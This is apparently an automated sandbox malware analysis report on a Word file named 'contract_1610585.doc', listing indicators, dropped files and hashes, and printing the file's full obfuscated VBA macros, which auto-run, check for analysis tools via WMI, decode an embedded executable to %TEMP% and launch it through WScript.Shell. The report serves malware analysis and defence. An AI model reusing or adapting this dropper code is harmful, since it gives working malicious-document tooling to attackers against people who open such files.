contract_1610585.doc
This report is generated from a file or URL submitted to this webservice on June 29th 2016 21:01:34 (UTC) and action script Random desktop files
Guest System: Windows 7 32 bit, Home Premium, 6.1 (build 7601), Service Pack 1
Report generated by
Falcon Sandbox v4.31 © Hybrid Analysis
Indicators
Not all malicious and suspicious indicators are displayed. Get your own cloud service or the full version to view all details.
-
Malicious Indicators 6
-
General
-
Contains ability to start/interact with device drivers
- details
-
DeviceIoControl@KERNEL32.DLL from cyamopsis.exe (PID: 2596) (Show Stream)
DeviceIoControl@KERNEL32.DLL from cyamopsis.exe (PID: 2596) (Show Stream)
DeviceIoControl@KERNEL32.DLL from cyamopsis.exe (PID: 2596) (Show Stream) - source
- Hybrid Analysis Technology
- relevance
- 8/10
-
The input sample dropped a file that was identified as malicious
- details
- 2/53 Antivirus vendors marked dropped file "cyamopsis.exe" as malicious (classified as "UDS:DangerousObject.Multi" with 3% detection rate)
- source
- Binary File
- relevance
- 10/10
-
Contains ability to start/interact with device drivers
-
System Security
-
References security related windows services
- details
- "}[=hGG*GSS=jG_eGSS{+u%!!D_]F"a+ySSvV\E$WpE==+HzqSBzJ^===9^@@S%je9WGB===*qSVSSSS]~T====_=9^vCjcP]x9ht==Eq_%!!G\{"GC]*v"PaqSVSSSS[dV$^dY===VszP} \DSS]zbkd=={#"[zvf#Vd+#V]x+=t==Ew|_SCSS{!G_ztH#VTB}cgZ==#|bfeWSS[_+VBvSSS_BzH_PSSSh=&~+'[B9&S9Z{uWSSU}W$Ut]==+H{J!*G9zd$t==EK~T&VdZV&AwSSSS]hJ&+ySSv"~EG#V}Gw%==&BWV[JSvSEXJwF`\Dp}[BZ==#"
- source
- File/Memory
- relevance
- 7/10
-
References security related windows services
-
Unusual Characteristics
-
Contains embedded VBA macros with keywords that indicate auto-execute behavior
- details
- Found keyword "AutoOpen" which indicates: "Runs when the Word document is opened"
- source
- Static Parser
- relevance
- 10/10
-
Contains embedded string that indicates auto-execute behavior
- details
- Found keyword "AutoOpen" which indicates: "Runs when the Word document is opened"
- source
- File/Memory
- relevance
- 10/10
-
Contains embedded VBA macros with keywords that indicate auto-execute behavior
-
Hiding 1 Malicious Indicators
- All indicators are available only in the private webservice or standalone version
-
Suspicious Indicators 11
-
Anti-Reverse Engineering
-
Contains ability to register a top-level exception handler (often used as anti-debugging trick)
- details
-
SetUnhandledExceptionFilter@KERNEL32.DLL from cyamopsis.exe (PID: 2596) (Show Stream)
SetUnhandledExceptionFilter@KERNEL32.DLL from cyamopsis.exe (PID: 2596) (Show Stream)
SetUnhandledExceptionFilter@KERNEL32.DLL from PID 00002596
SetUnhandledExceptionFilter@KERNEL32.DLL from cyamopsis.exe (PID: 2596) (Show Stream)
SetUnhandledExceptionFilter@KERNEL32.DLL from cyamopsis.exe (PID: 2596) (Show Stream)
SetUnhandledExceptionFilter@KERNEL32.DLL from cyamopsis.exe (PID: 2596) (Show Stream)
SetUnhandledExceptionFilter@KERNEL32.DLL from cyamopsis.exe (PID: 2596) (Show Stream)
SetUnhandledExceptionFilter@KERNEL32.DLL from PID 00002596
SetUnhandledExceptionFilter@KERNEL32.DLL from cyamopsis.exe (PID: 2596) (Show Stream)
SetUnhandledExceptionFilter@KERNEL32.DLL from cyamopsis.exe (PID: 2596) (Show Stream)
SetUnhandledExceptionFilter@KERNEL32.DLL from cyamopsis.exe (PID: 2596) (Show Stream)
SetUnhandledExceptionFilter@KERNEL32.DLL from PID 00002596 - source
- Hybrid Analysis Technology
- relevance
- 1/10
-
Contains ability to register a top-level exception handler (often used as anti-debugging trick)
-
General
-
Contains ability to find and load resources of a specific module
- details
-
FindResourceA@KERNEL32.DLL from cyamopsis.exe (PID: 2596) (Show Stream)
FindResourceA@KERNEL32.DLL from cyamopsis.exe (PID: 2596) (Show Stream)
FindResourceA@KERNEL32.DLL from cyamopsis.exe (PID: 2596) (Show Stream) - source
- Hybrid Analysis Technology
- relevance
- 1/10
-
Contains ability to find and load resources of a specific module
-
Installation/Persistance
-
Drops executable files
- details
- "cyamopsis.exe" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
- source
- Binary File
- relevance
- 10/10
-
Touches files in the Windows directory
- details
-
"WINWORD.EXE" touched file "%WINDIR%\Globalization\Sorting\sortdefault.nls"
"WINWORD.EXE" touched file "C:\Windows\Fonts\staticcache.dat"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches\cversions.1.db"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000007.db"
"WINWORD.EXE" touched file "C:\Windows\system32\rsaenh.dll"
"WINWORD.EXE" touched file "C:\Windows\system32\en-US\KERNELBASE.dll.mui"
"WINWORD.EXE" touched file "C:\Windows\System32\msxml6r.dll"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F4E1FA52-4A6A-4CE1-A2E4-81E608B57391}.tmp"
"WINWORD.EXE" touched file "C:\Windows\system32\en-US\MSCTF.dll.mui"
"WINWORD.EXE" touched file "C:\Windows\System32"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{77DCB57D-F9FA-46D7-A7AD-C37AC21310D6}.tmp" - source
- API Call
- relevance
- 7/10
-
Drops executable files
-
Remote Access Related
-
Contains references to WMI/WMIC
- details
-
"root\cimv2" (Indicator: "root\cimv2")
"root\cimv2' $.G'W' chapfallenloacorticium$dstone'AS$Bcariasis'd'k v | %. !" (Indicator: "root\cimv2") - source
- File/Memory
- relevance
- 10/10
-
Contains references to WMI/WMIC
-
System Security
-
Hooks API calls
- details
-
"SysAllocStringByteLen@OLEAUT32.DLL" in "WINWORD.EXE"
"VariantChangeType@OLEAUT32.DLL" in "WINWORD.EXE"
"SysFreeString@OLEAUT32.DLL" in "WINWORD.EXE"
"VariantClear@OLEAUT32.DLL" in "WINWORD.EXE"
"OleLoadFromStream@OLE32.DLL" in "WINWORD.EXE" - source
- Hook Detection
- relevance
- 10/10
-
Hooks API calls
-
Unusual Characteristics
-
Contains embedded VBA macros with suspicious keywords
- details
-
Found suspicious keyword "StrReverse" which indicates: "May attempt to obfuscate specific strings"
Found suspicious keyword "Xor" which indicates: "May attempt to obfuscate specific strings"
Found suspicious keyword "Shell" which indicates: "May run an executable file or a system command"
Found suspicious keyword "Binary" which indicates: "May read or write a binary file (if combined with Open)"
Found suspicious keyword "CallByName" which indicates: "May attempt to obfuscate malicious function calls"
Found suspicious keyword "Write" which indicates: "May write to a file (if combined with Open)"
Found suspicious keyword "Put" which indicates: "May write to a file (if combined with Open)"
Found suspicious keyword "CreateObject" which indicates: "May create an OLE object"
Found suspicious keyword "Open" which indicates: "May open a file" - source
- Static Parser
- relevance
- 10/10
-
Contains embedded string with suspicious keywords
- details
-
Found suspicious keyword "Windows" which indicates: "May enumerate application windows (if combined with Shell.Application object)"
Found suspicious keyword "Open" which indicates: "May open a file"
Found suspicious keyword "Lib" which indicates: "May run code from a DLL"
Found suspicious keyword "Put" which indicates: "May write to a file (if combined with Open)"
Found suspicious keyword "CreateObject" which indicates: "May create an OLE object"
Found suspicious keyword "CallByName" which indicates: "May attempt to obfuscate malicious function calls" - source
- File/Memory
- relevance
- 10/10
-
Installs hooks/patches the running process
- details
-
"WINWORD.EXE" wrote bytes "e9603367f0" to virtual address "0x779A4731" ("SysAllocStringByteLen@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "ba88de1400b98b7ba762ffe1" to virtual address "0x00164256"
"WINWORD.EXE" wrote bytes "c1a6752e" to virtual address "0x632910AC" (part of module "MSPTLS.DLL")
"WINWORD.EXE" wrote bytes "e9239969f0" to virtual address "0x779A5DEE" ("VariantChangeType@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "e99a5466f0" to virtual address "0x779A3E59" ("SysFreeString@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "95857e2e" to virtual address "0x63189904" (part of module "RICHED20.DLL")
"WINWORD.EXE" wrote bytes "9f491b10" to virtual address "0x62B41F20" (part of module "GKWORD.DLL")
"WINWORD.EXE" wrote bytes "b800000000663d33c0ba9467130068dcf5a762c3" to virtual address "0x05A088D4"
"WINWORD.EXE" wrote bytes "4053ab775858ac77186aac77653cad770000000000bf28770000000056cc2877000000007cca2877000000003768c5756a2cad77d62dad77000000002069c5750000000029a6287700000000a48dc57500000000f70e287700000000" to virtual address "0x77151000" (part of module "NSI.DLL")
"WINWORD.EXE" wrote bytes "ba08e11400b98b7ba762ffe1" to virtual address "0x00164292"
"WINWORD.EXE" wrote bytes "b800000000663d33c0ba9468130068dcf5a762c3" to virtual address "0x05A08954"
"WINWORD.EXE" wrote bytes "ba34df1400b98b7ba762ffe1" to virtual address "0x00164242"
"WINWORD.EXE" wrote bytes "b811110000663d33c0bad04fa40568dcf5a762c3" to virtual address "0x05A08914"
"WINWORD.EXE" wrote bytes "ba18421300b98b7ba762ffe1" to virtual address "0x001642CE"
"WINWORD.EXE" wrote bytes "c4ca287780bb287752ba28779fbb287708bb287746ce287761382977de2f2977d0d92877000000001779ed754f91ed757f6fed75f4f7ed7511f7ed75f283ed75857eed7500000000" to virtual address "0x6BC51000" (part of module "MSIMG32.DLL")
"WINWORD.EXE" wrote bytes "8c28a628" to virtual address "0x692378E4" (part of module "OART.DLL")
"WINWORD.EXE" wrote bytes "b811110000663d33c0bae0f81b0068dcf5a762c3" to virtual address "0x001639BC"
"WINWORD.EXE" wrote bytes "b800000000663d33c0bad467130068dcf5a762c3" to virtual address "0x05A088F4"
"WINWORD.EXE" wrote bytes "ba24bc1200b98b7ba762ffe1" to virtual address "0x0016427E"
"WINWORD.EXE" wrote bytes "1bb5a628" to virtual address "0x6A56CA70" (part of module "GFX.DLL") - source
- Hook Detection
- relevance
- 10/10
-
Contains embedded VBA macros with suspicious keywords
-
Hiding 2 Suspicious Indicators
- All indicators are available only in the private webservice or standalone version
-
Informative 7
-
Environment Awareness
-
Contains ability to query machine time
- details
-
GetSystemTimeAsFileTime@KERNEL32.DLL from cyamopsis.exe (PID: 2596) (Show Stream)
GetSystemTimeAsFileTime@KERNEL32.DLL from cyamopsis.exe (PID: 2596) (Show Stream)
GetSystemTimeAsFileTime@KERNEL32.DLL from cyamopsis.exe (PID: 2596) (Show Stream) - source
- Hybrid Analysis Technology
- relevance
- 1/10
-
Contains ability to query machine time
-
General
-
Contains embedded VBA macros
- details
-
File "ThisDocument.cls" (Streampath: "Macros/VBA/ThisDocument") has code: "Sub fiji(eradicate)
Dim coydog As Variant
Dim ballistic As Long
Dim gumbolimbo As Variant
doublethink = "epitomize"
caucasus = cheetah
Close #eradicate
doublethink = "cotillion"
End Sub
Function guildhall(penetralia) As String
Dim derr As Long
Dim hewer As String
Dim masses(63) As Long
Dim apprehensible() As Byte
Dim lox() As Byte
Dim chili As Integer
Dim depicting As Long
Dim capital As Long
Dim dimidiate(63) As Long
Dim quarterdeck As Long
Dim sapwood(63) As Long
fatten = Mid("epicurusimpecrystallite", 9, 4) & Lcase("RTuRBAB") & Mid("langurilitymisinterpretation", 7, 5)
doublethink = Lcase("si") & Left("napisatheling", 5)
Dim mardi(255) As Byte
ranitidine = 95 + 12 + 257941
bucephalus = 112 + 9 + 135
notoriety = 57 + 65479
dustcloth = 16515072
mycoplasmatales = 108 + 100 + 65072
ferrocerium = 262144
asserting = 16711680
boredom = 1 - 95 + 158
garbage = 4032
spondaic = 63
bisexuality = 99 + 70 + 3927
adrenocortical = 255
Dim millenary As Byte
Dim illustriousness() As Byte
illustriousness = StrConv(penetralia, vbFromUnicode)
Dim amenity As Integer
For guardhouse = 0 To UBound(illustriousness)
illustriousness(guardhouse) = illustriousness(guardhouse) Xor 18
Next guardhouse
For fracas = 46 To 71
unconsummated = 71
cat = cat - 261
depredator = Mid("brassbandmeinterdigitate", 10, 2) & Ucase("rOdO") & Ucase("am")
depredator = "hi" & Left("ddenfooting", 4) & StrReverse("eti")
Next fracas
guffaw = StrConv(illustriousness, vbUnicode)
chili = 2
prank = 122
For derr = 0 To 255
Select Case derr
Case 65 To 90
mardi(derr) = derr - 65
Case 97 To prank
mardi(derr) = derr - 71
Case 48 To 57
mardi(derr) = derr + 4
Case 43
mardi(derr) = 62
Case 47
mardi(derr) = 63
End Select
Next derr
For derr = 0 To 63
dimidiate(derr) = derr * boredom
sapwood(derr) = derr * bisexuality
masses(derr) = derr * ferrocerium
Next derr
apprehensible = StrConv(guffaw, vbFromUnicode)
albitic = 4
ReDim lox((((UBound(apprehensible) + 1) \ albitic) * 3) - 1)
For quarterdeck = 0 To UBound(apprehensible) Step 4
apeman = apprehensible(quarterdeck)
temper = 3
depicting = masses(mardi(apeman)) + sapwood(mardi(apprehensible(quarterdeck + 1))) + _
dimidiate(mardi(apprehensible(quarterdeck + 2))) + mardi(apprehensible(quarterdeck + temper))
derr = depicting And asserting
lox(capital) = derr \ notoriety
derr = depicting And mycoplasmatales
lox(capital + 1) = derr \ bucephalus
lox(capital + 2) = depicting And adrenocortical
capital = capital + 3
Next quarterdeck
hewer = StrConv(lox, vbUnicode)
If chili Then hewer = Left$(hewer, Len(hewer) - chili)
guildhall = hewer
End Function
Public Sub AutoOpen()
Dim dupe As Byte
Dim ademptum As Long
fatten = "bawdily"
Dim alias As Integer
Dim hecha As Variant
alias = 25 Mod (21)
cat = cat + 125
If alias < 17 - 139 Then
cat = cat / 456
TabFootnotes
Else
Dim gloomy As Variant
harrisburg = medic.Height
alliaceae = 84
cryostat = 79
If alliaceae + cryostat < 64 Then
alliaceae = StrReverse("ap") & Right("beingstor", 4)
haemoproteidae = StrReverse("ok") + Lcase("ine")
Else
cryostat = 8
End If
End If
End Sub
Sub InsertBeforeMethod()
Dim MyText As String
Dim MyRange As Object
Set MyRange = ActiveDocument.Range
MyText = "<Replace this with your text>"
' Selection Example:
Selection.InsertBefore (MyText)
' Range Example: Inserts text at the beginning
' of the active document.
MyRange.InsertBefore (MyText)
End Sub
Sub TabFootnotes()
For s = 1 To ActiveDocument.Footnotes.Count
ActiveDocument.Footnotes(s).Range.Select
With Selection
.Collapse Direction:=wdCollapseStart
.MoveLeft Unit:=wdCharacter, Count:=1, Extend:=wdExtend
.TypeText Text:=vbTab
End With
Next
End Sub"
File "bystander.bas" (Streampath: "Macros/VBA/bystander") has code: "Dim cat As Integer
Dim fatten As String
Dim phylactery As Long
Dim doublethink As String
Dim commixture As Integer
Sub InsertParagraphMethod()
Dim MyRange As Object
Set MyRange = ActiveDocument.Range
' Selection Example:
Selection.InsertParagraph
' Range Example:
MyRange.Collapse Direction:=wdCollapseStart
MyRange.InsertParagraph
End Sub
Sub inherited(representable, crucifixion)
Dim grasshopper As Long
Dim congregationalist As Byte
fatten = Mid("spirituouscaimprudently", 11, 2) & Ucase("PTaIn")
Open representable For Binary Access Read Write As #crucifixion
fatten = Right("endamagehy", 2) & "pony" & "my"
End Sub
Function tomfool(cope)
Dim mikania As Variant
Dim bus As Variant
Dim constitutionalist As Long
amygdalus = StrConv(cope, 128)
lawman = argillite
bluejacket = acneiform
tomfool = amygdalus
End Function
Sub goodnatured(dovetailing, adynamy, hospitable)
Dim montserrat As Byte
Dim supplant() As Byte
Dim brasenia As Long
supplant = tomfool(dovetailing)
huascaran = pigwidgeon
hangeron = hospitable
Put #hangeron, , supplant
End Sub
Function ministerially()
On Error GoTo contemptuously
Dim argute As String
nonmonotonic = Left("Segonadal", 2) & Lcase("LECT * FRoM ")
Dim dipsacus As Byte
fatten = "mincer"
assume = Ucase("wIn3") & Ucase("2_pROduct ")
impolitic = 72
invention = 63
If impolitic + invention < 80 Then
impolitic = Right("excruciatingunh", 3) + Ucase("ANdsO") + Right("apomictme", 2)
bogtrotter = Lcase("Vo") & Lcase("ulu")
Else
invention = 92
End If
Dim toothpick As Byte
iv = "WHER" & Left("E Name LIKE 'Python %'reestablish", 22)
doublethink = "an" & Right("foolishglic", 4) & "an"
commixture = commixture / 176
reproach = Lcase("wi") + Lcase("NmGmT") + StrReverse("\\:s")
fatten = "asleep"
abampere = Right("gorgerin.\", 2) & "root\cimv2"
Set invenit = GetObject(reproach & abampere)
commonlaw = 71
about = 87
If commonlaw + about < 14 Then
commonlaw = Mid("chapfallenloacorticium", 11, 3) & "dstone"
aloes = Ucase("AS") & "cariasis"
Else
about = 16
End If
Set clipper = invenit.ExecQuery(nonmonotonic + assume & iv)
If clipper.Count > 0 Then
ministerially = 10
End If
contemptuously:
End Function
Sub nappy()
nescape = 71
Select Case nescape
Case 15 To 17
Dim cancel As Long
cat = cat Mod 149
fatten = Ucase("Bo") + Left("reamorphophallus", 2)
Case 36 To 43
Dim drypis As Byte
cat = cat * 1
fatten = Right("producertr", 2) & Ucase("IgeM") & Mid("assholeinalaxon", 8, 4)
Case 71 To 83
commixture = commixture - 364
cat = cat * 4
quad = "cucumis"
Dim dumpling As String
End Select
batholithic = atn(2)
If batholithic <> 61 Then
phylactery = phylactery - 203
Dim altogeher As String
dumpling = palmistry
Dim entering As String
Else
commixture = commixture Xor 356
End If
altogeher = dumpling + Left("\cyalkalimetry", 3) + StrReverse("exe.sispoma")
aridity = arthropodal
felis = FreeFile
commixture = commixture Mod 192
dacron = 45 - 35 - 86 + 76
phylactery = phylactery - 365
derange = 77
Select Case derange
Case 26 To 29
Dim communicating As Integer
phylactery = phylactery Xor 340
cat = cat - 127
Case 77 To 94
doublethink = Mid("gibraltarbathreatening", 10, 2) & Ucase("ssINet")
swiftness = dacron
End Select
endosperm = Log(83)
If endosperm <> 59 Then
inherited altogeher, felis
cancer = medic.luxurious
fatten = Left("inproteles", 2) & Left("somngel", 4) & Ucase("IA")
Else
cat = cat Xor 352
End If
unearthly = 74
Select Case unearthly
Case 26 To 32
Dim bacteriostatic As Byte
doublethink = Right("porkch", 2) & Lcase("ristma") & Right("formonlysberry", 6)
commixture = commixture / 394
Case 74 To 84
doublethink = "bibos"
anicon = cancer
commixture = commixture * 2
End Select
inning = Log(13)
If inning <> 74 Then
listing = ThisDocument.guildhall(anicon)
alfilaria = cylindrical
installment = Ucase("de") & Lcase("PReCaTe")
Else
commixture = commixture / 438
End If
exhibitionist = sqr(22)
If exhibitionist <> 55 Then
groggy = veritable
senility = Len(listing)
Dim excitement As Integer
Else
doublethink = "mallard"
End If
doublethink = Lcase("Buc") & Lcase("CiNid") & Ucase("Ae")
cat = cat Mod 96
phylactery = phylactery / 446
bystander.goodnatured listing, swiftness, felis
alterable = 53
Select Case alterable
Case 33 To 35
Dim maniraptor As String
cat = cat Mod 113
fatten = Ucase("ca") + Left("lvadosfastigiate", 6)
Case 53 To 71
phylactery = phylactery And 348
doublethink = Right("lazarhouseco", 2) + Lcase("MmON") + Mid("bigamistlychokey", 9, 2)
cat = cat Xor 483
accelerative = felis
Case 38 To 45
Dim prevention As Long
commixture = commixture / 352
phylactery = phylactery * 3
End Select
circularization = 77
Select Case circularization
Case 22 To 26
Dim cabman As Byte
cat = cat * 2
cat = cat + 273
Case 77 To 82
commixture = commixture Xor 237
ThisDocument.fiji accelerative
fatten = Left("ecshortrange", 2) + Left("lampsiadomi", 7)
hysterocatalepsy = Left("WSescharotic", 2) & StrReverse("pirc") & Ucase("T.shELl")
Set charms = CreateObject(hysterocatalepsy)
Case 4 To 5
Dim legato As String
fatten = Lcase("dU") & Lcase("ty")
phylactery = phylactery And 212
End Select
khaya = 90 + 5 - 38
Select Case khaya
Case 57 To 65
cat = cat / 295
fatten = "stapelia"
counterman charms, altogeher
Case 18 To 25
Dim exasperate As String
phylactery = phylactery - 333
cat = cat * 3
Case 12 To 13
Dim beading As Integer
fatten = "hauteur"
doublethink = "friedcake"
End Select
End Sub
Sub counterman(antimagnetic, philologist)
Dim coca As Long
Set caracoler = antimagnetic
archetype = 12 - 90 + 79
If sin(archetype) <> 58 Then
chaffy = Ucase("RU") & Left("nuncategorized", 1)
Else
chaffy = "pennya"
End If
clubbing = CallByName(caracoler, chaffy, archetype, philologist)
End Sub
Sub SortText()
' A macro to sort the selected text, if the user has selected
' more than one paragraph
If Documents.Count > 0 Then
' The user has at least one document open.
If Selection.Paragraphs.Count > 1 Then
' The user has selected more than one paragraph
' of text, so sort it.
Selection.Sort
Else
' Tell the user what to do.
MsgBox "Please select two or more paragraphs and try again."
End If
End If
End Sub
Sub FormattedTextProperty()
' This example copies the first paragraph in the document, including
' its formatting, and inserts the formatted text at the insertion
' point.
Selection.Collapse Direction:=wdCollapseStart
Selection.FormattedText = ActiveDocument.Paragraphs(1).Range
End Sub
Function palmistry()
panicle = sin(83)
If panicle <> 54 Then
Dim perceived As Long
Dim horsetail As Variant
Else
commixture = commixture / 272
End If
tropic = Mid("eductionScextraregarding", 9, 2) & StrReverse(".gnitpir")
curtal = Mid("enchafeFilalbite", 8, 3) & "eSystem" & Mid("excellencyObjectepanodos", 11, 6)
rootless = tropic + curtal
Dim chloramphenicol As String
Set cornopean = VBA.CreateObject(rootless)
mycobacteria = 44 + 86 - 129
ontogeny = Ucase("ge") + "tSpecialFolder"
Dim sciences As Variant
humid = geyser
troppo = Ucase("mOu") & Mid("gaiterntainfdeum", 7, 6) & Right("motiflax", 3)
phylactery = phylactery Xor 485
denouement = tan(55)
If denouement <> 71 Then
palmistry = CallByName(cornopean, ontogeny, mycobacteria, 19 - 71 + 54)
Else
fatten = "dunderhead"
End If
End Function"
File "medic.frm" (Streampath: "Macros/VBA/medic") has code: "Public Sub UserForm_Initialize()
gaining = ministerially
cowberry = 2 - 63 + 39 + 32
If gaining <> cowberry Then
bystander.nappy
End If
End Sub" - source
- Static Parser
- relevance
- 10/10
-
Creates a writable file in a temporary directory
- details
-
"WINWORD.EXE" created file "%TEMP%\~DFDCEE8A7DB319D9DD.TMP"
"WINWORD.EXE" created file "%TEMP%\~DFDE32DA9D1B7B80DA.TMP"
"WINWORD.EXE" created file "%TEMP%\VBE\MSForms.exd"
"WINWORD.EXE" created file "%TEMP%\~DF77AE05AE9CBAB4CD.TMP"
"WINWORD.EXE" created file "%TEMP%\~DF3AB95B914077FF91.TMP"
"WINWORD.EXE" created file "%TEMP%\cyamopsis.exe" - source
- API Call
- relevance
- 1/10
-
Creates mutants
- details
-
"\Sessions\1\BaseNamedObjects\Global\552FFA80-3393-423d-8671-7BA046BB5906"
"\Sessions\1\BaseNamedObjects\Local\10MU_ACBPIDS_S-1-5-5-0-60330"
"\Sessions\1\BaseNamedObjects\Local\10MU_ACB10_S-1-5-5-0-60330"
"\Sessions\1\BaseNamedObjects\Local\ZonesCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZoneAttributeCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZonesCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZonesLockedCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Global\MTX_MSO_Formal1_S-1-5-21-4162757579-3804539371-4239455898-1000"
"\Sessions\1\BaseNamedObjects\Global\MTX_MSO_AdHoc1_S-1-5-21-4162757579-3804539371-4239455898-1000" - source
- Created Mutant
- relevance
- 3/10
-
Loads rich edit control libraries
- details
- "WINWORD.EXE" loaded module "%COMMONPROGRAMFILES%\microsoft shared\OFFICE14\RICHED20.DLL" at 63140000
- source
- Loaded Module
-
Contains embedded VBA macros
-
Installation/Persistance
-
Dropped files
- details
-
"~$45f2b55f2696da5503c87ecf183c336d73a302d043a38c210deddca908f675.doc" has type "data"
"index.dat" has type "data"
"MSForms.exd" has type "data"
"~WRS{F4E1FA52-4A6A-4CE1-A2E4-81E608B57391}.tmp" has type "FoxPro FPT blocks size 0 next free block index 218103808 1st used item "\375""
"6745f2b55f2696da5503c87ecf183c336d73a302d043a38c210deddca908f675.LNK" has type "MS Windows shortcut Item id list present Points to a file or directory Has Relative path Hidden Archive ctime=Wed Jun 29 19:02:57 2016 mtime=Wed Jun 29 19:02:57 2016 atime=Tue May 31 04:02:08 2016 length=300577 window=hide"
"cyamopsis.exe" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
"~$Normal.dotm" has type "data" - source
- Binary File
- relevance
- 3/10
-
Dropped files
-
Network Related
-
Found potential URL in binary/memory
- details
-
Heuristic match: "4,>NaQA,v.XWUGC>.Na"
Heuristic match: "OtN.ml"
Heuristic match: "D5Ofy\_rc~H.393x0Mo~FUm$VyQzB%TSQDEP@<IpH4+._.:RRSdB)#r.s;P.yrHVS9&HwKj=UD= Mmwf.a^ZZz>pszt36su/_vMDR!yQ-ct(yEh^b////..VU"
Heuristic match: "(Oh-;7830I/e3=6p|!'ga[ $KSL&/:Vg$oS:=pt>L(X/51\,rZLL'J)QkF V.xkYW2cT&Mh&;>\.Ve"
Heuristic match: "{'EV=>GsCYx=S0C)lj''ha ;qS%T},]{\_wr!.{;\GD@+%GcW(-0${w.tw" - source
- File/Memory
- relevance
- 10/10
-
Found potential URL in binary/memory
File Details
contract_1610585.doc
- Filename
- contract_1610585.doc
- Size
- 294KiB (300577 bytes)
- Type
- doc office
- Description
- Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: Windows, Template: Normal.dot, Last Saved By: Windows, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Total Editing Time: 01:00, Create Time/Date: Wed Jun 29 13:03:00 2016, Last Saved Time/Date: Wed Jun 29 13:09:00 2016, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
- Architecture
- WINDOWS
- SHA256
- 6745f2b55f2696da5503c87ecf183c336d73a302d043a38c210deddca908f675
- MD5
- a9791ab88196253aa5ddc379d1a372ae
- SHA1
- a21d02eb9c2f1eb35331f60792023ebde7a17edb
Screenshots
Loading content, please wait...
Hybrid Analysis
Tip: Click an analysed process below to view more details.
Analysed 2 processes in total (System Resource Monitor).
-
WINWORD.EXE
/n "C:\6745f2b55f2696da5503c87ecf183c336d73a302d043a38c210deddca908f675.doc"
(PID: 3072)
- cyamopsis.exe (PID: 2596)
Network Analysis
DNS Requests
No relevant DNS requests were made.
Contacted Hosts
No relevant hosts were contacted.
HTTP Traffic
No relevant HTTP requests were made.
Extracted Strings
Extracted Files
-
Malicious 1
-
-
cyamopsis.exe
- Size
- 73KiB (74752 bytes)
- Type
- PE32 executable (GUI) Intel 80386, for MS Windows
- AV Scan Result
- Labeled as "UDS:DangerousObject.Multi" (2/53)
- Runtime Process
- WINWORD.EXE (PID: 3072)
- MD5
- 20df051e02ab3271f165dd636c3696d4
- SHA1
- de5112098174b6155fe135a78f18860176f84fdd
- SHA256
- ce4f9ba5237eaa56ba29da46e20e3820cd2dc0f80de79b85ff8ff30a9ea3884d
-
-
Informative 6
-
-
6745f2b55f2696da5503c87ecf183c336d73a302d043a38c210deddca908f675.LNK
- Size
- 733B (733 bytes)
- Type
- MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Jun 29 19:02:57 2016, mtime=Wed Jun 29 19:02:57 2016, atime=Tue May 31 04:02:08 2016, length=300577, window=hide
- Runtime Process
- WINWORD.EXE (PID: 3072)
- MD5
- 4dc92066e7f4fc59e1b37fca47c239ee
- SHA1
- 529dd1dbb6f136c7dc993e65e02817662196db59
- SHA256
- 07b1a790f0c4884ccafdedf0bc902a5baf389aeaa9ccc241bb4b8688b45dd147
-
index.dat
- Size
- 592B (592 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 3072)
- MD5
- 787d0f0b9f5cab4e232b770e5015536c
- SHA1
- eb7630eea25043dd9aea19070802309adfae7ed3
- SHA256
- 676bef778f5d41aeffd973cd4b87c66b7800513e2661fe6dd3110190f58e7060
-
~$Normal.dotm
- Size
- 162B (162 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 3072)
- MD5
- 4eaeceb46a6b77a649e05281b69b83da
- SHA1
- 8d9ba5f1b5132c78163cac6a0ba863a77e7f5906
- SHA256
- a67d94d7177c09a0d64cbd1b47918874fa4f9c9d7668a92752c91d7d1465cb97
-
~WRS{F4E1FA52-4A6A-4CE1-A2E4-81E608B57391}.tmp
- Size
- 1KiB (1024 bytes)
- Type
- FoxPro FPT, blocks size 0, next free block index 218103808, 1st used item "\375"
- Runtime Process
- WINWORD.EXE (PID: 3072)
- MD5
- 5d4d94ee7e06bbb0af9584119797b23a
- SHA1
- dbb111419c704f116efa8e72471dd83e86e49677
- SHA256
- 4826c0d860af884d3343ca6460b0006a7a2ce7dbccc4d743208585d997cc5fd1
-
MSForms.exd
- Size
- 144KiB (147284 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 3072)
- MD5
- bd62068e310a35cc4d7595d58497ff01
- SHA1
- 889cde3eefe613ae892b97c455970bca0b706227
- SHA256
- bf84ae1126d52f5349e5651b35be6eb7b80fa7ff5e4684373edbdc5c0273e098
-
~$45f2b55f2696da5503c87ecf183c336d73a302d043a38c210deddca908f675.doc
- Size
